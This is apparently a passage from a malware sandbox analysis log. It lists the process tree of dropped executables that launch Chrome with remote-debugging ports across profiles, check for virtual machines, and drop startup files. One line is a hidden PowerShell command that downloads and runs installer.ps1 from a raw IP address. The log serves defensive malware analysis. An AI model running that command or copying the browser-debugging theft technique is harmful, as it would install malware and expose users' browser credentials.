        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3600 --field-trial-handle=1468,i,328667954511933558,15527900849454057401,131072 /prefetch:2
        8⤵
        
        PID:2708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1468,i,328667954511933558,15527900849454057401,131072 /prefetch:8
        8⤵
        
        PID:3152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3368
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7c89758,0x7fef7c89768,0x7fef7c89778
        8⤵
        
        PID:3380
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:3536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1360,i,6109265013730250235,14610696099345245880,131072 /prefetch:2
        8⤵
        
        PID:3600
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1420 --field-trial-handle=1360,i,6109265013730250235,14610696099345245880,131072 /prefetch:8
        8⤵
        
        PID:3608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1612 --field-trial-handle=1360,i,6109265013730250235,14610696099345245880,131072 /prefetch:8
        8⤵
        
        PID:3628
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2348 --field-trial-handle=1360,i,6109265013730250235,14610696099345245880,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3744
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2620 --field-trial-handle=1360,i,6109265013730250235,14610696099345245880,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3920
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2628 --field-trial-handle=1360,i,6109265013730250235,14610696099345245880,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3948
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1528 --field-trial-handle=1360,i,6109265013730250235,14610696099345245880,131072 /prefetch:2
        8⤵
        
        PID:800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3840 --field-trial-handle=1360,i,6109265013730250235,14610696099345245880,131072 /prefetch:8
        8⤵
        
        PID:1444
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1196
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7c89758,0x7fef7c89768,0x7fef7c89778
        8⤵
        
        PID:2432
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:3688
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1124 --field-trial-handle=1276,i,230203585583451278,10305662877137527272,131072 /prefetch:2
        8⤵
        
        PID:3772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1276,i,230203585583451278,10305662877137527272,131072 /prefetch:8
        8⤵
        
        PID:3788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1612 --field-trial-handle=1276,i,230203585583451278,10305662877137527272,131072 /prefetch:8
        8⤵
        
        PID:3880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2392 --field-trial-handle=1276,i,230203585583451278,10305662877137527272,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1436
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2644 --field-trial-handle=1276,i,230203585583451278,10305662877137527272,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3276
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2652 --field-trial-handle=1276,i,230203585583451278,10305662877137527272,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1432 --field-trial-handle=1276,i,230203585583451278,10305662877137527272,131072 /prefetch:2
        8⤵
        
        PID:2708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1276,i,230203585583451278,10305662877137527272,131072 /prefetch:8
        8⤵
        
        PID:2664
      - C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2092
      - C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
        6⤵
        Executes dropped EXE
        
        PID:2732
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BC.tmp\CD.tmp\CE.bat C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
        7⤵
        
        PID:2344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2844
      - C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1848
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 1192
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:3096
      - C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2644
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1036
        8⤵
        Loads dropped DLL
        Program crash
        
        PID:1652
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 500
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:3008
      - C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2340
        
        C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:3736
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7c89758,0x7fef7c89768,0x7fef7c89778
        9⤵
        
        PID:1200
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        9⤵
        
        PID:944
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1216,i,5987224212797163706,14184774198986200087,131072 /prefetch:2
        9⤵
        
        PID:2432
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1216,i,5987224212797163706,14184774198986200087,131072 /prefetch:8
        9⤵
        
        PID:3484
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 --field-trial-handle=1216,i,5987224212797163706,14184774198986200087,131072 /prefetch:8
        9⤵
        
        PID:4072
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2280 --field-trial-handle=1216,i,5987224212797163706,14184774198986200087,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2492
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2332 --field-trial-handle=1216,i,5987224212797163706,14184774198986200087,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1328
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1436 --field-trial-handle=1216,i,5987224212797163706,14184774198986200087,131072 /prefetch:2
        9⤵
        
        PID:3480
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2200 --field-trial-handle=1216,i,5987224212797163706,14184774198986200087,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3976
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3356 --field-trial-handle=1216,i,5987224212797163706,14184774198986200087,131072 /prefetch:8
        9⤵
        
        PID:3692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3456 --field-trial-handle=1216,i,5987224212797163706,14184774198986200087,131072 /prefetch:8
        9⤵
        
        PID:2336
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3676 --field-trial-handle=1216,i,5987224212797163706,14184774198986200087,131072 /prefetch:8
        9⤵
        
        PID:552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Guest Profile"
        8⤵
        Uses browser remote debugging
        
        PID:1684
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7c89758,0x7fef7c89768,0x7fef7c89778
        9⤵
        
        PID:448
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        9⤵
        
        PID:2592
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1084 --field-trial-handle=1268,i,2834032383774195376,14014868128101535127,131072 /prefetch:2
        9⤵
        
        PID:3424
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1268,i,2834032383774195376,14014868128101535127,131072 /prefetch:8
        9⤵
        
        PID:940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1568 --field-trial-handle=1268,i,2834032383774195376,14014868128101535127,131072 /prefetch:8
        9⤵
        
        PID:2300
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2148 --field-trial-handle=1268,i,2834032383774195376,14014868128101535127,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2512 --field-trial-handle=1268,i,2834032383774195376,14014868128101535127,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1240
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2620 --field-trial-handle=1268,i,2834032383774195376,14014868128101535127,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2748
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1452 --field-trial-handle=1268,i,2834032383774195376,14014868128101535127,131072 /prefetch:2
        9⤵
        
        PID:1992
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3820 --field-trial-handle=1268,i,2834032383774195376,14014868128101535127,131072 /prefetch:8
        9⤵
        
        PID:3732
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="System Profile"
        8⤵
        Uses browser remote debugging
        
        PID:1572
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef79c9758,0x7fef79c9768,0x7fef79c9778
        9⤵
        
        PID:3768
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        9⤵
        
        PID:3076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1120 --field-trial-handle=1332,i,7328932041499506485,14764092603209718717,131072 /prefetch:2
        9⤵
        
        PID:2028
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1332,i,7328932041499506485,14764092603209718717,131072 /prefetch:8
        9⤵
        
        PID:772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1508 --field-trial-handle=1332,i,7328932041499506485,14764092603209718717,131072 /prefetch:8
        9⤵
        
        PID:1680
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2112 --field-trial-handle=1332,i,7328932041499506485,14764092603209718717,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2716 --field-trial-handle=1332,i,7328932041499506485,14764092603209718717,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2744 --field-trial-handle=1332,i,7328932041499506485,14764092603209718717,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
